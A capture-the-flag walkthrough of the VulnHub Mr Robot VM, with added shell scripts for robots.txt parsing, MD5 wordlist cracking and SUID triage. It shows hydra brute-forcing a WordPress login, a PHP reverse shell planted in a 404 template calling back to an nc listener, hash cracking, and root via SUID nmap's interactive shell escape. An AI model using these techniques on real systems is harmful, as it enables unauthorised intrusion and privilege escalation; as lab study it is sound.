vulnhub robot notes
I did the eJPT a while back and hadn't really looked at any practical security content since then, so I thought I'd spin up a VulnHub VM. I'm just going to outline the broad steps I took to completion, as this is more of a note-taking entry. I will list at the end any major rabbit holes I went down.
This VM has three keys to find and is listed as beginner-intermediate. Mr Robot on VulnHub
After a quick scan on the internal subnet I ran a scan against the discovered VM address and found the following:
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 08:00:27:5D:81:9C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
A quick view of the webpage shows an animated message, so to get a better look at what's hosted on the webserver I ran a quick dirb. A lot of directories were discovered, so I'm truncating the list to what I think is most useful to look at next.
dirb http://10.10.100.50
http://10.10.100.50/robots.txt
http://10.10.100.50/wp-login
...
A quick look at robots.txt gave one of the three keys plus, more importantly, a .dic file which, when downloaded, contains a large dump of passwords. wp-login obviously shows this is a WordPress site. I tried a few random logins and, given the name of the VM, correctly guessed a username.
The next step was to brute-force the WordPress login with hydra, using the guessed username elliot and the downloaded password dump fsocity.dic. The S=Location success condition in the form spec treats a reply that carries a Location header (the redirect WordPress sends after a valid login, whereas a failed attempt just re-renders the form) as a hit:
hydra -l elliot -P ~/Downloads/fsocity.dic 10.10.100.50 -F -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
[80][http-post-form] host: 10.10.100.50   login: elliot   password: ER28-0652
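Going back to the enumeration step above: robots.txt is worth parsing properly rather than eyeballing, because every path it names is a resource the site owner did not want indexed. The following is an added example, not code from the original write-up, that turns a saved robots.txt into a list of paths and full URLs. It assumes a POSIX awk(1); the sample file used in the assertions is constructed for the example and is not the VM's real robots.txt.

```shell
#!/bin/sh
# Added example (not from the original write-up): turn a saved robots.txt into
# a list of paths worth requesting. Assumes POSIX awk(1) and sh(1).

# robots_paths FILE   prints one candidate path per line:
#   - the target of every Disallow:/Allow:/Sitemap: directive
#   - any bare line that is not a directive or comment (some challenge boxes
#     list filenames with no directive at all)
# Comments, blank lines, User-agent/Crawl-delay/Host lines and a bare "/" are
# dropped, because none of them name a specific resource.
robots_paths() {
    awk '
        { sub(/\r$/, ""); sub(/#.*/, ""); gsub(/^[ \t]+|[ \t]+$/, "") }
        $0 == "" { next }
        tolower($0) ~ /^(user-agent|crawl-delay|host):/ { next }
        tolower($0) ~ /^(disallow|allow|sitemap):/ {
            sub(/^[^:]*:[ \t]*/, "")
            if ($0 != "" && $0 != "/") print
            next
        }
        { print }
    ' "$1"
}

# robots_urls BASE FILE   prefixes each path with BASE (e.g. http://10.10.100.50)
# so the output can be fed straight to curl or a request loop. Absolute URLs
# (Sitemap: lines) are passed through unchanged.
robots_urls() {
    base=${1%/}
    robots_paths "$2" | while IFS= read -r p; do
        case $p in
            http://*|https://*) printf '%s\n' "$p" ;;
            /*)                 printf '%s%s\n' "$base" "$p" ;;
            *)                  printf '%s/%s\n' "$base" "$p" ;;
        esac
    done
}
```

Usage against the box would be `curl -s http://10.10.100.50/robots.txt -o robots.txt` followed by `robots_urls http://10.10.100.50 robots.txt`, and the URL list can then be piped into a curl loop that prints the status code per URL; anything answering 200 is the next thing to download.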
The next step was to try to get a reverse shell. I set a listener with sudo nc -lvp 6666 and added the reverse shell code from https://github.com/pentestmonkey/php-reverse-shell to the WordPress 404 page on the site; once that page was requested, the shell connected back to the listener:
admin01@kali-1:~$ sudo nc -lvp 6666
listening on [any] 6666 ...
10.10.100.50: inverse host lookup failed: Unknown host
connect to [10.10.100.51] from (UNKNOWN) [10.10.100.50] 44199
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 09:51:53 up 12:39,  0 users,  load average: 4.71, 4.97, 5.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
python -c 'import pty; pty.spawn("/bin/sh")'
$ whoami
daemon
$ hostname
linux
After a bit of looking around I found the second key, but I don't have access to read it. Alongside it there is an MD5 hash of a password listed (a hash, not an encrypted value, so it has to be cracked rather than decrypted), so the plan is to run that through John the Ripper.
$ pwd
/home/robot
$ ls
key-2-of-3.txt  password.raw-md5
$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
$ ls -al
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
Copied the string to my VM and ran the following
sudo john --format=raw-md5 ./robot-pass.txt
With John the Ripper running (see notes below) I tried a few online MD5 lookup sites, and one, https://md5.web-max.ca, came up good.
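To make the cracking step concrete, here is an added example, not code from the original write-up, that does by hand what `john --format=raw-md5` with a wordlist does: hash each candidate and compare it to the stored digest. It assumes GNU coreutils md5sum is available. The hash in the demo is the one from password.raw-md5; the stand-in wordlist is constructed for the example. That particular digest is MD5("abcdefghijklmnopqrstuvwxyz"), the RFC 1321 test vector, which is why the online lookup sites had it instantly.

```shell
#!/bin/sh
# Added example (not from the original write-up): a dictionary attack on a
# john-style "user:md5hex" line. Assumes GNU coreutils md5sum is available.

# crack_raw_md5 HASHFILE WORDLIST
# HASHFILE holds "user:md5hex" lines (the format of the VM's password.raw-md5);
# WORDLIST holds one candidate per line. Prints "user:plaintext" for every
# hash a candidate matches. Exit status is 0 only when every hash was cracked.
crack_raw_md5() {
    hashfile=$1
    wordlist=$2
    uncracked=0
    while IFS=: read -r user hash; do
        [ -n "$hash" ] || continue
        hash=$(printf '%s' "$hash" | tr 'A-F' 'a-f')
        hit=0
        # `|| [ -n "$word" ]` keeps a final line that lacks a trailing newline
        while IFS= read -r word || [ -n "$word" ]; do
            # printf, not echo: echo would append "\n" and change the digest
            digest=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)
            if [ "$digest" = "$hash" ]; then
                printf '%s:%s\n' "$user" "$word"
                hit=1
                break
            fi
        done < "$wordlist"
        [ "$hit" -eq 1 ] || uncracked=$((uncracked + 1))
    done < "$hashfile"
    [ "$uncracked" -eq 0 ]
}

# demo_crack   writes the hash from the VM and a constructed stand-in for
# fsocity.dic (a few filler words plus the real plaintext) to a temp dir and
# runs the attack. c3fcd3... is MD5("abcdefghijklmnopqrstuvwxyz"), the
# RFC 1321 test vector.
demo_crack() {
    tmp=$(mktemp -d) || return 1
    printf 'robot:c3fcd3d76192e4007dfb496cca67e13b\n' > "$tmp/robot-pass.txt"
    printf '%s\n' password fsociety elliot abcdefghijklmnopqrstuvwxyz mrrobot > "$tmp/words.dic"
    crack_raw_md5 "$tmp/robot-pass.txt" "$tmp/words.dic"
    rc=$?
    rm -rf "$tmp"
    return $rc
}
```

The loop is deliberately naive (one fork per candidate), which is exactly why john exists; the point is that raw-md5 is unsalted, so a plain wordlist, or a wordlist plus mangling rules as in the notes below, is all it takes.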
A quick su to the robot account and I got the second key:
robot@linux:~$ whoami
whoami
robot
robot@linux:~$ pwd
pwd
/home/robot
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
Checking for any interesting SUID or SGID executables, I saw that nmap was installed with the SUID bit set and owned by root (tut tut!).
$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
. . .
/usr/local/bin/nmap
Old nmap builds have an interactive mode in which anything prefixed with ! is handed to the shell, and because the binary is SUID root those commands run as root. I was able to run it in interactive mode and get the last key:
$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
root
nmap> !ls /root
firstboot_done  key-3-of-3.txt
nmap> !cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
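The SUID hunt above is the one check I would never skip on a Linux box. As an added example, not code from the original write-up, here it is wrapped in a function together with a triage pass that flags binaries known to hand out a shell when they run as root (old nmap via --interactive, find via -exec, editors via their shell escapes, interpreters directly). It assumes POSIX find(1), ls(1) and awk(1); the SHELL_CAPABLE list is a short, non-exhaustive one chosen for the example, and the files the demo creates are constructed, not copied from the VM.

```shell
#!/bin/sh
# Added example (not from the original write-up): SUID discovery plus a simple
# triage of the hits. Assumes POSIX find(1), ls(1), awk(1) and sh(1).

# Binaries that can execute arbitrary commands once they run with euid 0.
# Non-exhaustive list chosen for this example.
SHELL_CAPABLE="nmap find vim vi python perl bash sh env awk less more"

# list_suid ROOT   prints every regular file under ROOT with the setuid bit set.
# -perm -4000 is the numeric spelling of the -perm -u=s used in the notes.
list_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null
}

# triage_suid ROOT   prints "owner path" for each SUID file under ROOT and
# appends " [shell-capable]" when the basename is in SHELL_CAPABLE. A line
# that shows root as the owner and carries the tag is a direct route to uid 0.
triage_suid() {
    list_suid "$1" | while IFS= read -r path; do
        owner=$(ls -ld "$path" | awk '{ print $3 }')
        name=${path##*/}
        tag=''
        for s in $SHELL_CAPABLE; do
            if [ "$name" = "$s" ]; then
                tag=' [shell-capable]'
                break
            fi
        done
        printf '%s %s%s\n' "$owner" "$path" "$tag"
    done
}

# demo_suid_hunt   builds a throwaway tree with one SUID "nmap" and one plain
# file (constructed for the example), runs the triage and cleans up.
demo_suid_hunt() {
    tmp=$(mktemp -d) || return 1
    : > "$tmp/nmap";  chmod 4755 "$tmp/nmap"
    : > "$tmp/plain"; chmod 0755 "$tmp/plain"
    triage_suid "$tmp"
    rc=$?
    rm -rf "$tmp"
    return $rc
}
```

On a real target you would run `triage_suid /`; on the Mr Robot box the root-owned /usr/local/bin/nmap line would be the one tagged, which is exactly the finding the notes act on.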
rabbit holes
- I did try to brute-force SSH using the discovered username and password dump but got an immediate connection refused; seems it's key-based authentication only.
- John the Ripper's default settings didn't crack anything after many hours. I did try later using the downloaded .dic password file AND the --rules flag, and it did discover the password.
- Before going down the SUID route I compiled multiple kernel exploits listed in Exploit-DB, as the kernel was running 3.13.0, but none of them ran successfully.